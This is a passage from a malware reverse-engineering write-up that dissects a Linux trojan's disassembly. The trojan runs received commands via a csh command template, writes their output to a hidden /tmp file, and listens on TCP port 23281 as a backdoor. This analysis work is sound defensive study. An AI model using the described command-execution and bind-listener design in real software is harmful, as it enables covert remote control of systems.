a buffer we've already identified as Buffer_A.
It works like this:
If Global_B (set by third byte in the manipulated buffer) = 2
Buffer_A will be set directly to contents of the manipulated
buffer.
Else
Buffer_A's contents will be set using random numbers.
It's not quite as simple as a direct memory fill. Buffer_A seems
to be structured in 4 byte increments, and the buffer is either
copied, or filled with random numbers accordingly.
We had an earlier assumption that Buffer_A is 40 bytes long. Given
this loop iterates 10 times and fills 4 bytes at a time, I think
this assumption can now be accepted as true.
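The shape of the loop, as understood so far, can be sketched in Python. This is a model of the control flow only: which bytes of the manipulated buffer feed each slot has not been determined, so the source offsets used below are purely hypothetical, as are all the names.

```python
import random

SLOTS = 10       # loop runs %ebx = 0 .. 9
SLOT_SIZE = 4    # Buffer_A appears to be filled 4 bytes at a time


def fill_buffer_a(buffer_a, skip_index, global_b, manipulated):
    """Model of the loop at 0x8048454 - 0x8048532."""
    for i in range(SLOTS):
        if i == skip_index:          # cmpl %edi,%ebx ; je 0x804852b
            continue                 # this slot is left for later
        start = i * SLOT_SIZE
        if global_b == 2:            # cmpl $0x2,0x807e784
            # HYPOTHETICAL source offset: the real one was not worked out.
            chunk = manipulated[start:start + SLOT_SIZE]
        else:
            chunk = random.getrandbits(32).to_bytes(SLOT_SIZE, "little")
        buffer_a[start:start + SLOT_SIZE] = chunk
    return buffer_a


demo = fill_buffer_a(bytearray(40), 3, 2, bytes(range(40)))
print(demo.hex())
```

Whatever the exact sources are, the model shows why 40 bytes is the natural size: ten slots of 4 bytes, nine of them filled by the loop and one skipped.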
After this loop completes:
0x8048538: movl 0x807e784,%eax
0x804853d: testl %eax,%eax
0x804853f: jne 0x8048543
0x8048541: xorl %edi,%edi
0x807e784 is Global_B. In effect, if Global_B = 0 then we'll xor
out %edi to 0. %edi doesn't seem to be a permanent variable of any
kind, and is used in a short time just after this check:
0x8048543: cmpl $0x2,%eax
0x8048546: je 0x8048eb8
In effect, this will compare Global_B to 0x2. If it is equal, it
will jmp off to 0x8048eb8 which should now be familiar as a break
from the switch().
At this point in time, we engage in a 4 byte copy from the
manipulated buffer:
0x8048555: movb 0xfffff003(%ebp),%al
0x804855b: movl 0xffffbb1c(%ebp),%ecx
0x8048561: movb %al,(%edi,%ecx,1)
[....]
After this we break from the switch and jmp off to 0x8048eb8 ready
to sleep and recv() all over again.
This section's purpose is still in the dark, however i am sure all
will be revealed as soon as Buffer_A's purpose can be identified.
[This section is re-examined later when more information is known
about the various buffers. The re-analysis is named
Re-Examination_A.]
0x08048590:
The very first thing we do here is call 0x80571e8 which is our fork
code. Very interesting. Just as interesting is this:
0x8048595: movl %eax,0x807e770
0x804859a: testl %eax,%eax
0x804859c: jne 0x8048eb8
Effectively, if the parent processes this code, the PID of the child
will be stored at 0x807e770. We'll name this heap variable as
PID_Var_A. Continuing if we are the parent, we will simply end this
case code and return back to the main recv() loop.
If we are the child, there is a lot more interesting stuff to be
done. Very first is a call to 0x805733c which corresponds to a
setsid() (not confirmed at this point in time).
Following this:
0x80485a7: pushl $0x1
0x80485a9: pushl $0x11
0x80485ab: call 0x80569bc
0x80485b0: call 0x80571e8
The 0x80569bc call with stack setup would correspond to:
signal(SIGCHLD, SIG_IGN)
This is immediately followed by another fork() call which does
something interesting.
If %eax is >0 (if we are the parent process)
Execute the following:
0x80485bc: pushl $0xa
0x80485be: call 0x80556cc
0x80485c3: pushl $0x9
0x80485c5: movl 0x807e770,%eax
0x80485ca: pushl %eax
0x80485cb: call 0x80572b0
0x80485d0: pushl $0x0
0x80485d2: call 0x8055fbc
0x80556cc has not yet been identified. So we go look..
This function calls:
0x8057360:
0x8057364: movl $0x7e,%eax
0x8057372: int $0x80
This corresponds to sigprocmask()
0x80574c8:
0x80574ef: movl $0x43,%eax
0x80574f7: int $0x80
This corresponds to sigaction()
0x8057444 = time() (already identified)
0x8057418:
0x805741c: movl $0x1b,%eax
0x8057421: movl 0x8(%ebp),%ebx
0x8057424: int $0x80
This corresponds to alarm()
0x805751c:
0x8057522: movl $0x48,%eax
0x8057530: int $0x80
This corresponds to sigsuspend()
The function can still not be satisfactorily identified, however
it is possibly a sleep() which would indicate the function at
0x80555b0 is not sleep() (it might be a usleep()). If indeed
this function IS a sleep(), then it should be easily verifiable
during runtime analysis.
In assuming this function was a sleep, this would indicate a 10
second sleep occurs.
Returning back to 0x80485cb, a call of 0x80572b0 is executed.
This function is also not known, so....
0x80572b4: movl $0x25,%eax
0x80572bf: int $0x80
This corresponds to a kill()
Just for ease, we'll reshow the code from above:
0x80485c3: pushl $0x9
0x80485c5: movl 0x807e770,%eax
0x80485ca: pushl %eax
0x80485cb: call 0x80572b0
Since we also know what 0x807e770 is, this all looks like:
kill(PID_Var_A, 9)
The next call is to 0x8055fbc, and has already been identified as
an exit() (still only assumed but still seems logical).
This ends the parent process from the last fork. I am unsure if
this is a bug on behalf of the author. Since we are the child
process from the first fork, PID_Var_A would be 0, so this may
not actually work as intended. Perhaps this does kill the child
process too, but first thoughts make me believe this is a bug.
One way or another, the parent process from the most recent fork
is no more. [Turns out this kill DOES work. kill() with a pid of
0 signals every process in the caller's process group, which
after the setsid() above would cover both sides of the latest
fork.]
Else (if we were the child process)
We pick up again at 0x80485d8. One of the first things we do is
this loop:
0x80485dc: movb 0xfffff002(%ebx,%ebp,1),%al
0x80485e3: movb %al,0xfffff000(%ebx,%ebp,1)
0x80485ea: incl %ebx
0x80485eb: cmpl $0x18d,%ebx
0x80485f1: jle 0x80485dc
This may be as simple as an optimised memcpy(). All it does is
copy bytes from 0xfffff002(%ebp) to 0xfffff000(%ebp) until %ebx
passes 0x18d (0x18e bytes if %ebx starts at 0, which is not shown
above). This effectively shifts the data across by 2 bytes in the
buffer that was earlier passed to Data_Manipulation_Function_A.
This would make sense considering we earlier used the 2nd byte of
the data to determine the switch() outcome.
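The effect of the loop is easy to see on a small example. This Python sketch assumes %ebx starts at 0 and uses a hypothetical decoded buffer whose first two bytes are a header (the second byte, 3, being the switch selector for this case) followed by a NUL-terminated command; the contents are invented for illustration.

```python
def shift_left_two(buf: bytearray, count: int = 0x18E) -> bytearray:
    """Model of the loop at 0x80485dc - 0x80485f1."""
    for i in range(count):     # %ebx = 0 .. 0x18d inclusive (jle)
        buf[i] = buf[i + 2]    # byte at 0xfffff002+i copied to 0xfffff000+i
    return buf


# Hypothetical decoded buffer: 2 header bytes, then a command string.
decoded = bytearray((b"\x00\x03" + b"id\x00").ljust(0x800, b"\x00"))
shifted = shift_left_two(decoded)
print(bytes(shifted[:3]))
```

After the shift the command string starts at the very beginning of the buffer, ready to be used as an ordinary C string.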
Following on:
0x80485f3: pushl $0x80675e6
0x80485f8: movl 0xffffbb20(%ebp),%ecx
0x80485fe: pushl %ecx
0x80485ff: pushl $0x80675f5
0x8048604: leal 0xfffff800(%ebp),%ebx
0x804860a: pushl %ebx
0x804860b: call 0x804f808
0x804f808 is an unidentified function. In earlier trying to
follow it, I found it too complex and long to follow, so instead
we'll look at some of its parameters:
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
(gdb) x/1s 0x80675f5
0x80675f5: "/bin/csh -f -c \"%s\" 1> %s 2>&1"
0xffffbb20(%ebp) is a pointer to 0xfffff000(%ebp) which is the
buffer that was earlier passed to Data_Manipulation_Function_A.
0xfffff800(%ebp) is the buffer that was earlier passed to the
recv() function.
The string contents at 0x80675f5 stand out to give us a fairly
reasonable guess as to what the function is (i.e. *printf/*scanf).
As a guess, one would expect 0xfffff000, now that it has been
shifted two bytes to the left, to be a string command sent by the
blackhat. We still cannot assume an sprintf() until:
0x8048610: pushl %ebx
0x8048611: call 0x80557e8
This call is as yet unidentified, so in following it, we see it
does interrupt executions of: sigaction, sigprocmask, fork, execve.
Since it's not a direct execve call (and given the redirection
string that was passed to it) it is assumed the function at
0x80557e8 is system(). This is not verified, but given the amount
of code involved with this function, I'm more tempted to assume
than have to verify it... Also, the earlier function at 0x804f808
is now also assumed to be a sprintf(). Given all the work done to
the buffer in %ebx (shifting it), and the string parameters being
located in the binary's static data, I cannot see a reason for an
sscanf(). The sprintf() assumption needs to be true in order for
system() to function correctly.
So assuming all the above, our execution looks like:
/bin/csh -f -c "somecommand" 1> /tmp/.hj237349 2>&1
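The expansion can be checked without running anything. The sketch below
assumes 0x804f808 really is sprintf() and that the arguments are
(dest, format, command, output file), as the push order suggests. The
name build_command is mine, and "somecommand" is just a stand-in.

```python
# Both strings are the ones dumped from the binary with gdb.
FORMAT = '/bin/csh -f -c "%s" 1> %s 2>&1'
OUTPUT_FILE = "/tmp/.hj237349"


def build_command(command: str) -> str:
    """Mimic sprintf(dest, FORMAT, command, OUTPUT_FILE); nothing is executed."""
    return FORMAT % (command, OUTPUT_FILE)


print(build_command("somecommand"))
```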
This is a simple cshell command redirection into /tmp/.hj237349
which at first glance might seem kind of pointless, however:
0x8048616: pushl $0x8067614
0x804861b: pushl $0x80675e6
0x8048620: call 0x804f620
The call is fairly long, so to cut a long story short:
0x80572e0: movl $0x5,%eax
0x80572ee: int $0x80
We end up with an open() call. The parameters to this call look
like this:
(gdb) x/1s 0x8067614
0x8067614: "rb"
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
It's fairly clear this is a fopen() call, however it was only
quickly skimmed through and could be something else.
After checking that the fopen() call succeeds and doing some
parameter setup, we end up calling 0x804f6d4. This function is
an unknown, and unfortunately the call at 0x8061d42 makes life
a little more difficult. Instead of trying to work out what the
internals of this function do, we'll look at its parameters that
have been pushed onto the stack before it is called:
0x8048644: movl 0xffffbb24(%ebp),%ecx
0x804864a: pushl %ecx
0x804864b: pushl $0x18e
0x8048650: pushl $0x1
0x8048652: leal 0xfffff800(%ebp),%eax
0x8048658: pushl %eax
0x8048659: call 0x804f6d4
This looks like:
function(Buffer, 1, 0x18e, 0xffffbb24(%ebp))
This still doesn't help much until we realise what
0xffffbb24(%ebp) actually is. Just after the fopen():
0x8048625: movl %eax,0xffffbb24(%ebp)
So, it looks like 0xffffbb24(%ebp) is our file descriptor. Now
an immediate assumption would be an fread or fwrite. Considering
our permissions on the file, we'll assume 0x804f6d4 is an fread().
We then engage in a memcpy-type arrangement:
0x8048670: movb 0xfffff800(%ebx,%ebp,1),%al
0x8048677: movb %al,0xfffff002(%ebx,%ebp,1)
0x804867e: incl %ebx
0x804867f: cmpl $0x18d,%ebx
0x8048685: jle 0x8048670
This copies the data read from the file into the buffer starting
at 0xfffff002(%ebp). We then pass a pointer to this buffer,
starting at 0xfffff000(%ebp), to the function at 0x804a194
(Data_Manipulation_Function_B), followed by a call of
Network_Function_A.
It is at this point I am almost certain that
Data_Manipulation_Function_A is some kind of decoder, and
Data_Manipulation_Function_B is some kind of encoder.
The encoded data would then be passed to Network_Function_A,
which would pass the encoded packets on to the blackhat.
We can't treat this as an exact conclusion until
those three functions have been analysed in depth, however it's
looking like a pretty solid guess.
Jumping back just before we encode the data however, something
interesting happens. The code seems to keep tabs on %edi:
0x8048687: testl %edi,%edi
0x8048689: jne 0x804869c
It seems to act as a toggle. At first I didn't catch the second
loop and thus couldn't understand this, but when one realises that
there is a loop that continuously reads 0x18e bytes from the file
and sends the number of bytes read, then reads another 0x18e bytes
(if it is available) then sends that..etc..etc.., then the
purpose of %edi is realised. As the first packet is created, the
2nd byte is set to a 3, and %edi is set to 1. Changing %edi like
this enables the trojan to know to send the next section of up to
0x18e bytes with the 2nd byte set to a 4. This is undoubtedly for
the benefit of any client listening to the response. We can
immediately assume something about the client from this, but we'll
look at client conclusions later.
A call to what we currently believe to be a usleep()
implementation is then done with a 0x61a80 (400000 microsecond)
sleep time.
When we finally finish reading all the data from the redirection
file, we fall out of the loop and end up at
0x80486f9.
From here:
0x80486f9: movl 0xffffbb24(%ebp),%edx
0x80486ff: pushl %edx
0x8048700: call 0x804f540
The function call is unknown at this time, but 0xffffbb24(%ebp)
looks familiar, and looking back to the fopen() and fread(), this
would have to be the file descriptor.
One could immediately assume this function call is an fclose(),
but even I'm not into those sort of jumpy assumptions.
Following the long call chain associated with this function
reveals nothing! It is an extremely long function, with the only
system call found being munmap(). A lot of variable calls are
made which make tracking this function extremely difficult.
One would have been hoping for a %eax of 6 with an int $0x80 to
show up, but it was not to be. It's not enough to simply call it
a definite fclose() simply because it 'fits' into what one would
expect. The author could have buggy code! But a massive
assumption will be needed for the moment until runtime debugging
can confirm or deny...
Returning back to the case code at 0x8048705:
0x8048705: pushl $0x80675e6
0x804870a: call 0x80573bc
(gdb) x/1s 0x80675e6
0x80675e6: "/tmp/.hj237349"
A file delete would fit in nicely here too, BUT :)
Once again 0x80573bc is unidentified soooo.....
0x80573c0: movl $0xa,%eax
0x80573c8: int $0x80
This seems to be the only thing this function does. Wow. Just
when I was losing faith in disassembling calls to see what they
do, one works out. This, upon consultation with one's
asm/unistd.h, shows it to be an unlink("/tmp/.hj237349").
Next please:
0x8048712: pushl $0x0
0x8048714: call 0x8057554
Another function we have no references for. So we follow and:
0x8057558: movl $0x1,%eax
0x8057560: int $0x80
None other than exit() code. We already have a function we
assumed was exit()...
Can be easily explained, they're both exit() code. :)
The exit() at 0x8057554 is very simplistic with no atexit() checks
so it could only be an _exit() call. This doesn't confirm that the
currently assumed code at 0x8055fbc is indeed exit() however.
This use of _exit() shows us some information about the author of
this binary too. More about this in Author Conclusions later.
End of child process.
A summary of this case section is definitely needed:
Uses csh to execute a string (probably passed encoded within the
same packet)
Redirects output to /tmp/.hj237349
Opens /tmp/.hj237349
Reads /tmp/.hj237349 in 0x18e(398) byte increments
Appears to possibly 'encode' each read 398 byte buffer using
Data_Manipulation_Function_B, and passes the probable 'output'
of this function to Network_Function_A. Network_Function_A then
most likely puts the supplied buffer into a packet and forwards
it onto the blackhat.
The actual buffer construction (which would explain the odd
number of 398) seems to have 2 bytes at the front, followed by
the 398 byte fread() buffer contents.
The first byte is unknown and appears to strangely enough end up
being the first byte of the command executed. The second byte
is:
3 for the first 398 byte buffer.
4 for every buffer thereafter.
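The framing described in this summary can be sketched as follows. This
models only the layout (2 header bytes plus up to 398 data bytes, with
the second byte going 3, 4, 4, ...). The encoding done by
Data_Manipulation_Function_B is not modelled, and whether a short final
read is padded is not established here. The names build_frames and
first_byte are mine, and first_byte is a placeholder because its meaning
is still unknown.

```python
CHUNK = 0x18e  # 398 bytes requested per fread()


def build_frames(output: bytes, first_byte: int = 0) -> list:
    """Split command output into frames of 2 header bytes + up to 398 data bytes."""
    frames = []
    for index, start in enumerate(range(0, len(output), CHUNK)):
        kind = 3 if index == 0 else 4      # %edi toggle: 3 first, 4 afterwards
        frames.append(bytes([first_byte, kind]) + output[start:start + CHUNK])
    return frames


# 1000 bytes of made-up command output.
frames = build_frames(b"A" * 1000)
print([(frame[1], len(frame) - 2) for frame in frames])
```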
It should be remembered that the code before all this occurs
included a kill() that would occur after a 10 second sleep. In
looking up the man page for kill(), I learn something new ;)
When the pid passed to kill is 0, the signal is sent to every
process in the process group of the sender. This is a
pretty effective way to ensure a system() command doesn't stay
running.
Pretty impressive case-section, compared to what I've seen in other
trojans anyway.
0x0804871c:
Straight into it:
0x804871c: cmpl $0x0,0x807e774
0x8048723: jne 0x8048eb8
0x807e774 is an unknown variable. Given the reference to 0x807e778,
it would be fair to believe 0x807e774 to be a maximum of 4 bytes.
We'll call it PID_Var_B [Changed to this name - you will see why in
a minute]
So the first thing this case section does, is check PID_Var_B. If
it is nonzero, it'll jmp to 0x8048eb8 which once again is the end of
the switch(), involving a sleep(), then jmping back to the recv().
Looking at the following:
0x8048729: movl $0x4,0x807e778
0x8048733: call 0x80571e8
Firstly sets 0x807e778 (We will term this as Global_C) to 4 [This
just happens to also be the switch()'s case #4 - watch this space]
The call to 0x80571e8 we have already worked out to be a fork(). So
once again it looks like we're going to fork whatever this case does
into its own process:
0x8048738: movl %eax,0x807e774
0x804873d: testl %eax,%eax
0x804873f: jne 0x8048eb8
If we are the parent process, we will end up with the PID of the
child in PID_Var_B (hence why we named it this earlier), and will
jmp back out of the switch() ready to sleep and recv() again.
If we are the child process however:
0x8048745: leal 0xffffbb44(%ebp),%edi
0x804874b: leal 0xfffff000(%ebp),%esi
0x8048751: cld
0x8048752: movl $0x3f,%ecx
0x8048757: repz movsl %ds:(%esi),%es:(%edi)
0x8048759: movsw %ds:(%esi),%es:(%edi)
0x804875b: movsb %ds:(%esi),%es:(%edi)
We copy 0x3f*4 bytes (252 bytes) from 0xfffff000(%ebp) to
0xffffbb44(%ebp). A further 3 bytes are then strangely copied in
a separate method directly after.
0xffffbb44(%ebp) is an unknown, but can be assumed to mark the start
of a buffer due to the copying of a large portion of memory. The
size of this buffer is not known but should be at least 255bytes
long (the amount of data copied). This variable will be assigned
the name of Buffer_B.
The source for the data copy, 0xfffff000(%ebp), is the well known
buffer that was passed to Data_Manipulation_Function_A much earlier.
Strangely enough, yet another copy loop is started:
0x8048760: movb 0xffffbb4d(%ebx,%ebp,1),%al
0x8048767: movb %al,0xffffbb44(%ebx,%ebp,1)
0x804876e: incl %ebx
0x804876f: cmpl $0xfe,%ebx
0x8048775: jle 0x8048760
%ebx starts off at 0. The code's purpose seems to be to shift the
contents of the buffer to the left by 9 bytes. This would indicate
that Buffer_B is actually longer than 255 bytes: the last byte read
is at offset 254+9 (263), so it must be at least 264 bytes. Being
such an odd number, the buffer is assumed to be somewhat larger.
After all this effort, we're left with Buffer_B containing a 9 byte
left-shifted copy of some buffer (probably decoded data) from
Data_Manipulation_Function_A.
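The byte counts here are easy to get wrong by one, so here is the
arithmetic written out. All the constants are taken from the
instructions above. The variable names are mine, and offsets are
counted from 0 at the start of Buffer_B.

```python
# rep movsl with %ecx = 0x3f copies 0x3f dwords; movsw and movsb add 2 + 1 bytes.
copied = 0x3F * 4 + 2 + 1

# The shift loop runs for %ebx = 0..0xfe and reads from 0xffffbb4d + %ebx.
shift = 0xFFFFBB4D - 0xFFFFBB44
iterations = 0xFE + 1
highest_read = shift + 0xFE          # largest offset into Buffer_B that is read
min_buffer_len = highest_read + 1    # offsets start at 0

print(copied, shift, iterations, highest_read, min_buffer_len)
```

Note that the shift loop reads past the 255 bytes that were copied in,
so the last 9 bytes it moves are whatever was already on the stack.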
The rest of this section focuses on setting up a call. It starts
off simple, pushing a leal of Buffer_B onto the stack so obviously
this function uses this buffer. The next bit is strange, with
single bytes starting from 0xfffff002(%ebp) to 0xfffff008(%ebp)
being pushed onto the stack, one at a time, obviously in reverse
stack order. A 0 is stacked midway too. The actual function call
looks like this:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), 0, *0xfffff006(%ebp),
*0xfffff007(%ebp), *0xfffff008(%ebp), 0xffffbb44(%ebp))
The values actually passed were movzbl'd so it's assumed they are
single bytes (makes sense considering the individual pushes).
The actual function call of 0x8049174 contains several calls
including:
0x8049213: call 0x8056cf4
which matches a socket() call. The function is long and will
most certainly be analysed later in the Function Analysis section.
This call has been given the name of Network_Function_B.
After this function completes:
0x80487c0: pushl $0x0
0x80487c2: call 0x8057554
This function has already been identified as _exit(), which should
end up terminating this child process.
0x080487c8:
This case section upon first glance is almost identical to the case
code just analysed at 0x0804871c. Once again, it looks at
PID_Var_B, and if it is non-zero (might indicate something else is
running!), it will simply return back into the main recv() loop.
Otherwise, it sets Global_C to 5 (this is also the 5th case
statement...), forks off and does a similar copy with one difference:
0x804880c: movb 0xffffbb51(%ebx,%ebp,1),%al
0x8048813: movb %al,0xffffbb44(%ebx,%ebp,1)
0x804881a: incl %ebx
0x804881b: cmpl $0xfe,%ebx
0x8048821: jle 0x804880c
The difference? The starting position for the read. It is 13 bytes
in front, so the effect of this loop is to shift the data in
Buffer_B left by 13 bytes (as opposed to 9 in the previous case).
This code is extremely similar to the previous case statement, but
now it all changes. A different function is called, one at
0x80499f4. This function, just like the one at 0x8049174
(Network_Function_B), contains socket calls. Therefore we will name
it Network_Function_C and analyse it in the Function Analysis
section.
The stack setup makes the function call look like this:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), 0xffffbb44(%ebp))
0xffffbb44(%ebp) is of course Buffer_B. It's a bit strange the way
so many individual bytes are passed to the function when it would
have had so much less overhead to pass them as a whole.
Nevertheless, this case section finishes identical to the previous
one, with a call to 0x8057554 aka _exit().
0x08048894:
As with what seems to be standard:
0x8048894: cmpl $0x0,0x807e774
0x804889b: jne 0x8048eb8
We check PID_Var_B and if it is not zero (assumed to mean another
case section is running), this case section will terminate, and
control will be passed back to the main recv() loop.
Otherwise (if no other case section is running), we go straight into
the following:
0x80488a1: movl $0x6,0x807e778
0x807e778 matches up with our Global_C. We haven't seen this
variable since the very first case section. We set it equal to 6.
Coincidentally, this is the 6th case statement (Are we seeing a
pattern yet?).
The following code is fairly easily explained:
0x80488ab: pushl $0x1
0x80488ad: pushl $0x11
0x80488af: call 0x80569bc
0x80488b4: call 0x80571e8
First call has been seen many times before, it is once again a:
signal(SIGCHLD, SIG_IGN)
The second call matches up with a fork(). For the parent process,
the following has significance:
0x80488b9: movl %eax,0x807e774
Effectively storing the PID of the child into PID_Var_B. The parent
process will then jump back into the main recv() loop while the
child continues on:
0x80488c9: call 0x805733c
0x80488ce: pushl $0x1
0x80488d0: pushl $0x11
0x80488d2: call 0x80569bc
0x805733c corresponds to an assumed setsid() and the next three
lines as before, correspond to a SIGCHLD ignore.
Now things get interesting:
0x80488d7: movw $0x2,0xffffee38(%ebp)
0x80488e0: addl $0x8,%esp
0x80488e3: movw $0xf15a,0xffffee3a(%ebp)
0x80488ec: movl $0x0,0xffffee3c(%ebp)
0x80488f6: movl $0x1,0xffffbb40(%ebp)
0xffffee38(%ebp) is an unknown at the moment, as are
0xffffee3a(%ebp), 0xffffee3c(%ebp), and 0xffffbb40(%ebp). Size
predictions of these references could be made, however skimming
through the rest of the code indicates no need to bother (You'll
soon see why).
0x8048900: pushl $0x0
0x8048902: pushl $0x1
0x8048904: pushl $0x2
0x8048906: call 0x8056cf4
0x804890b: movl %eax,0xffffbb38(%ebp)
0x8056cf4 is a socket() call, therefore the stack indicates:
socket(AF_INET, SOCK_STREAM, 0)
The socket descriptor is then stored at 0xffffbb38(%ebp).
Continuing:
0x8048911: pushl $0x1
0x8048913: pushl $0x11
0x8048915: call 0x80569bc
0x804891a: pushl $0x1
0x804891c: pushl $0x11
0x804891e: call 0x80569bc
Yet again, the author ignores SIGCHLD twice for some reason.
More ignores follow:
0x8048923: pushl $0x1
0x8048925: pushl $0x1
0x8048927: call 0x80569bc
0x804892c: addl $0x24,%esp
0x804892f: pushl $0x1
0x8048931: pushl $0xf
0x8048933: call 0x80569bc
0x8048938: pushl $0x1
0x804893a: pushl $0x2
0x804893c: call 0x80569bc
These are signal ignore calls for HUP, TERM, and INT.
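The push pairs can be decoded mechanically. This sketch assumes
0x80569bc really is signal(), as identified earlier, and uses the signal
and handler values for Linux on i386. The tables are deliberately
hard-coded rather than taken from the host system, and the function name
is mine.

```python
# Signal numbers and handler constants as defined for Linux on i386.
SIGNALS = {1: "SIGHUP", 2: "SIGINT", 15: "SIGTERM", 17: "SIGCHLD"}
HANDLERS = {0: "SIG_DFL", 1: "SIG_IGN"}


def decode_signal_call(pushes):
    """pushes holds the immediates in push order, so the last argument comes first."""
    handler, signum = pushes
    return "signal(%s, %s)" % (SIGNALS[signum], HANDLERS[handler])


# The four distinct push pairs seen in this case section.
calls = [(0x1, 0x11), (0x1, 0x1), (0x1, 0xF), (0x1, 0x2)]
decoded = [decode_signal_call(pushes) for pushes in calls]
for line in decoded:
    print(line)
```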
Finally something more interesting:
0x8048941: pushl $0x4
0x8048943: leal 0xffffbb40(%ebp),%eax
0x8048949: pushl %eax
0x804894a: pushl $0x2
0x804894c: pushl $0x1
0x804894e: movl 0xffffbb38(%ebp),%ecx
0x8048954: pushl %ecx
0x8048955: call 0x8056c9c
0x8056c9c is yet unidentified, so:
0x8056cc2: movl $0xe,%edx
0x8056cca: movl $0x66,%eax
0x8056ccf: movl %edx,%ebx
0x8056cd1: int $0x80
0x66 %eax corresponds to a socketcall. The 0xe in %ebx is for a
SYS_SETSOCKOPT. Returning to case code and reconstructing the call:
setsockopt(*0xffffbb38(%ebp), 1, 2, 0xffffbb40(%ebp), 4)
To put some perspective on the parameters:
setsockopt(int s, int level, int optname, const void *optval,
socklen_t optlen)
Looking at previous assignments to these memory locations, we can
now see the following:
0xffffbb38(%ebp) is the socket assigned by socket() call.
1 corresponds to a level of SOL_SOCKET
2 corresponds to an option of SO_REUSEADDR
*0xffffbb40(%ebp) was earlier set to 1
4 corresponds to the length of *0xffffbb40(%ebp).
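This enables SO_REUSEADDR on the socket, which lets bind() reuse a
local address that would otherwise be reported as already in use
(for example while old connections sit in TIME_WAIT). Possibly this
is to prevent clashes with other applications or earlier instances
of this binary.
Next call setup looks like this: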
0x804895d: pushl $0x10
0x804895f: leal 0xffffee38(%ebp),%eax
0x8048965: pushl %eax
0x8048966: movl 0xffffbb38(%ebp),%edx
0x804896c: pushl %edx
0x804896d: call 0x8056a74
0x8056a74 is an unknown function...
0x8056a8d: movl $0x2,%edx
0x8056a95: movl $0x66,%eax
0x8056a9a: movl %edx,%ebx
0x8056a9c: int $0x80
Or rather, "was" an unknown function :)
Looking up a type 2 socketcall, shows it does a SYS_BIND. The
function does nothing else, so it's more than likely a bind()
function.
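Since the same lookup is done over and over (find the int $0x80, read
%eax, and for socketcall read %ebx too), it can be written down as a
small table. Only the numbers that actually turn up in this analysis
are included. They are the Linux i386 values from asm/unistd.h and
linux/net.h. The function name identify is mine.

```python
# Subset of the i386 system call table (asm/unistd.h).
SYSCALLS = {1: "exit", 2: "fork", 5: "open", 6: "close", 10: "unlink",
            11: "execve", 37: "kill", 63: "dup2", 90: "mmap", 91: "munmap",
            102: "socketcall"}

# Subset of the socketcall sub-function numbers (linux/net.h).
SOCKETCALLS = {1: "socket", 2: "bind", 3: "connect", 4: "listen", 5: "accept",
               9: "send", 10: "recv", 14: "setsockopt"}


def identify(eax, ebx=None):
    """Name the system call selected by %eax (and %ebx for socketcall)."""
    name = SYSCALLS.get(eax, "unknown")
    if name == "socketcall" and ebx is not None:
        return SOCKETCALLS.get(ebx, "unknown socketcall")
    return name


print(identify(0x66, 0xe), identify(0x66, 0x2), identify(0xa))
```

This only names the system call a wrapper ends in. It says nothing
about what else a longer library function does on the way there.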
Looking at a generic bind() call:
int bind(int s, const struct sockaddr *addr, socklen_t addrlen)
Now inserting the relevant parts:
bind(*0xffffbb38(%ebp), 0xffffee38(%ebp), 0x10)
*0xffffbb38(%ebp) is self explanatory as the socket descriptor.
0xffffee38(%ebp) however should have some interesting information,
especially what port this socket is going to be bound to! This
would be fairly easy to look up during a runtime analysis, but it's
not much harder to do now.
We saw earlier in this case section the following:
0x80488d7: movw $0x2,0xffffee38(%ebp)
0x80488e3: movw $0xf15a,0xffffee3a(%ebp)
0x80488ec: movl $0x0,0xffffee3c(%ebp)
sockaddr structure:
struct sockaddr
{
unsigned short sa_family;
char sa_data[14];
};
As we saw, the first word was set to a 2, indicating a family of
AF_INET. The bind function will now use the structure for this
family, sockaddr_in.
sockaddr_in structure:
struct sockaddr_in {
short int sin_family;
unsigned short int sin_port;
struct in_addr sin_addr;
unsigned char __pad[...];
};
The next word put into the buffer corresponds to the port. As we
saw, 0xf15a is placed into this location, which translates to....
Almost forgot byte ordering. The movw stores 0xf15a little endian,
so the bytes in memory are 0x5a 0xf1. sin_port is read in network
byte order (big endian), giving 0x5af1, which translates into 23281.
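The byte order juggling can be double-checked with Python's struct
module. The sketch packs the three stores the way a little endian x86
would lay them out in memory, then reads the fields back the way
sockaddr_in defines them. Only the first 8 bytes of the structure are
modelled, and the variable names are mine.

```python
import struct

# movw $0x2,...; movw $0xf15a,...; movl $0x0,... as stored by a little endian host
raw = struct.pack("<HHI", 0x2, 0xF15A, 0x0)

family = struct.unpack_from("<H", raw, 0)[0]   # sin_family is in host order
port = struct.unpack_from(">H", raw, 2)[0]     # sin_port is in network (big endian) order
addr = struct.unpack_from(">I", raw, 4)[0]     # sin_addr, 0 means INADDR_ANY

print(raw.hex(), family, hex(port), port, addr)
```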
0x8048972: pushl $0x3
0x8048974: movl 0xffffbb38(%ebp),%ecx
0x804897a: pushl %ecx
0x804897b: call 0x8056b04
Once again this function is unknown. It wouldn't take much to guess
what it is, but let's prove rather than guess:
0x8056b17: movl $0x4,%edx
0x8056b1f: movl $0x66,%eax
0x8056b24: movl %edx,%ebx
0x8056b26: int $0x80
As one might have expected, this is a SYS_LISTEN call. With
parameters in place, it looks like this:
listen(*0xffffbb38(%ebp), 3)
*0xffffbb38(%ebp) once again, is the socket descriptor of our
SOCK_STREAM socket that is bound to 23281.
As expected after a listen:
0x8048984: leal 0xffffbb3c(%ebp),%eax
0x804898a: pushl %eax
0x804898b: leal 0xffffee28(%ebp),%eax
0x8048991: pushl %eax
0x8048992: movl 0xffffbb38(%ebp),%edx
0x8048998: pushl %edx
0x8048999: call 0x8056a2c
As could be guessed, the code at 0x8056a2c contains:
0x8056a45: movl $0x5,%edx
0x8056a4d: movl $0x66,%eax
0x8056a52: movl %edx,%ebx
0x8056a54: int $0x80
This is a SYS_ACCEPT socketcall. Putting parameters into the right
spots:
accept(*0xffffbb38(%ebp), 0xffffee28(%ebp), 0xffffbb3c(%ebp))
First is obviously the socket, the next should be a sockaddr
structure, while the last should have been set to the size of that
structure (This was verified as done earlier at 0x8048171).
If this accept fails with a return of 0, a jump to an exit() occurs.
Otherwise, we launch straight into a call to 0x80571e8 (a fork()).
If we end up being the parent of that call, we jump back up to
